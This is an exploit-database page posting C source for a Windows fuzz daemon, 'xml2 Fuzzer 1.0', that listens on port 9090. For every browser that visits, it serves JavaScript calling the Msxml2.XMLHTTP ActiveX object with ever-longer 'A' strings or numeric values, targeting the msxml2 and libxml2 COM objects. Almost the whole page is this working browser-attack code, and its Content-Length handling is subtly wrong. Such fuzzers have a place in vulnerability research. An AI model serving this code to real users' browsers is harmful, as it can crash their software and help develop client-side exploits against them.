xml2 Fuzzer 1.0 exploit

🗓️ 27 Aug 2013 00:00:00Reported by x90cType
zdt🔗 0day.today👁 19 Views
xml2 Fuzzer 1.0 exploit to com object of client side in web browser. Listen fuzz daemon [9090/tcp] for libxml2, msxml2 com object. Include "stdafx.h" for Win32 and add wsock32.lib to link optio
/*

  xml2 fuzz ver 1.0

    --
    C:\x90c\xml2_fuzz> ./xml_fuzz
                    ___    ___
                   / _ \  / _ \
            __  __| (_) || | | |  ___
             \ \/ / __. || | | | / __|
             >  <    / / | |_| || (__
            /_/\_\  /_/   \___/  \___|

               xml2 fuzzer ver 1.0

     ./xml2_fuzz

     xml2 fuzz: listen fuzz daemon [9090/tcp]
    --

    [Description]:

    It's a fuzz daemon to exploit
    to com object of client side in
    web browser

  (1) xml2 fuzz daemon listen
  (2) web browser open url of the fuzz daemon
  (3) the url request to xml2 COM object with fuzz str
      for instance, AAAA fuzz, numeric fuzz

    target program is libxml2, msxml2 com object

    note)
     Include "stdafx.h" for win32 and add wsock32.lib
     to link option. I did compile test for it
  

  x90c

*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#define  FUZZ_DAEMON_PORT    (9090)

/*
    fuzz type
*/
#define AAAA_FUZZ  (1)
#define NUMERIC_FUZZ    (2)

static char http_res[65535];
static char fuzz_str[65535];
static unsigned int fuzz_int;
static int fuzz_int_neg;

void set_fuzz_str(char *mal_str);

static char fmt_fuzz_str[] = {
"HTTP/1.1 200 OK\n"
"Content-Type: text/html\n"
"Date: Sat Aug 28 1976 09:15:00 GMT\n"
"Expires: Sat Aug 28 1976 09:15:00 GMT\n"
"Cache-Control: no-cache, must-revalidate\n"
"Pragma: no-cache\n"
"Accept-Ranges: bytes\n"
"Content-Length: %d\r\n\r\n"
"\n<script>\n"
"  function xml2_exploit() {\n"
"    var request_url = location.protocol + '//' + location.host + '/'\n"
"    var xml_http_request = new ActiveXObject('Msxml2.XMLHTTP.3.0');\n"
"    xml_http_request.open(%s, request_url, false);\n"
"    xml_http_request.send();\n"
"    setTimeout(xml2_exploit, 1);\n"
"  }\n"
"  xml2_exploit();\n"
"</script>\n"
"\r\n\r\n"
};

int fuzz_start(int fuzz_type) {
  int srv_sockfd = 0, cld_sockfd = 0;
  struct sockaddr_in srv_addr, cld_addr;
  int cld_addr_len = sizeof(struct sockaddr);
  char recv_buf[1024];
  WSADATA wsaData;
  int mal_index = 0;
  int cnt_aaaa=1;

  WSAStartup(0x202, &wsaData);

  memset(&srv_addr, 0, sizeof(struct sockaddr_in));
  srv_addr.sin_family = AF_INET;
  srv_addr.sin_addr.s_addr = INADDR_ANY;
  srv_addr.sin_port = htons(FUZZ_DAEMON_PORT);

  if((srv_sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) <= 0)
    return -1;
  if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(struct sockaddr)) < 0){
  closesocket(srv_sockfd);
    return -2;
  }
  if(listen(srv_sockfd, 1) < 0){
  closesocket(srv_sockfd);
    return -3;
  }

    memset(fuzz_str, 0, sizeof fuzz_str);
    fuzz_str[0] = 'A';
    set_fuzz_str(fuzz_str);
    fuzz_int = 0x0;
    fuzz_int_neg = 0;

  printf("xml2 fuzz: listen fuzz daemon [%d/tcp] \n", FUZZ_DAEMON_PORT);

accept_again:
  if((cld_sockfd = accept(srv_sockfd, (struct sockaddr *)&cld_addr, &cld_addr_len)) == -1){
  closesocket(srv_sockfd);
    return -4;
  }

  memset(&recv_buf, 0, sizeof(recv_buf));

recv_again:
  if(recv(cld_sockfd, &recv_buf[0], sizeof(recv_buf) - 1, 0) <= 0)
    goto recv_again;

  printf("recv data: %s\n", recv_buf);

  if(strstr(&recv_buf[0], "GET / HTTP/1.1") != NULL)
  {
    printf("HTTP response 200\n");
    send(cld_sockfd, &http_res[0], strlen(http_res), 0);
    closesocket(cld_sockfd);
    
    memset(fuzz_str, 0, sizeof fuzz_str);

    switch(fuzz_type){
        case AAAA_FUZZ:    // AAAAAAAA... fuzz
            ++cnt_aaaa;
          if(cnt_aaaa == 65535)
              goto fuzz_end;

            memset(fuzz_str, 'A', cnt_aaaa);
            set_fuzz_str(fuzz_str);
          break;
    case NUMERIC_FUZZ:    // 0x00000000 ~ 0xffffffff, -0x00000000 ~ -0xffffffff fuzz
          if(fuzz_int_neg == 0)
              sprintf(fuzz_str, "%d", fuzz_int);
          else if(fuzz_int_neg == 1){
              if(fuzz_int >= 0xffffffff)
                    goto fuzz_end;

          sprintf(fuzz_str, "-%d", fuzz_int);
      }

          set_fuzz_str(fuzz_str);

          ++fuzz_int;
          if(fuzz_int >= 0xffffffff){
              fuzz_int_neg = 1;
            fuzz_int = 0x0;
      }

      break;
    }

    goto accept_again;
  }

fuzz_end:
    fprintf(stderr, "xml2 fuzz: fuzz end!\n");
    if(srv_sockfd)
        closesocket(srv_sockfd);

  return 0;
}

void set_fuzz_str(char *mal_str) {
  if(strlen(mal_str) > 65535-1){
    printf("xml2 fuzz: too long malformed string\n");
    exit(-1);
  }
  memset((void *)&http_res, 0, sizeof(http_res));
  sprintf(http_res, fmt_fuzz_str, sizeof(http_res), mal_str);
}

static char banner[] = {
"               ___    ___             \n" \
"              / _ \\  / _ \\          \n" \
"       __  __| (_) || | | |  ___      \n" \
"       \\ \\/ / \__. || | | | / __|   \n" \
"        >  <    / / | |_| || (__      \n" \
"       /_/\\_\\  /_/   \\___/  \\___| \n" \
"                                      \n" \
"          xml2 fuzzer ver 1.0         \n" \
"                                      \n" \
"  ./xml2_fuzz                         \n" \
"                                      \n"
};

int main() {
    int ret = 0;

    printf("%s", banner);

    if((ret = fuzz_start(AAAA_FUZZ)) < 0)
        fprintf(stderr, "xml2 fuzz: start failed!\n");
/*
    if((ret = fuzz_start(NUMERIC_FUZZ)) < 0)
        fprintf(stderr, "xml2 fuzz: start failed!\n");
*/

    return 0;
}

#  0day.today [2018-02-18]  #
27 Aug 2013 00:00Current
6.9Medium risk
Vulners AI Score6.9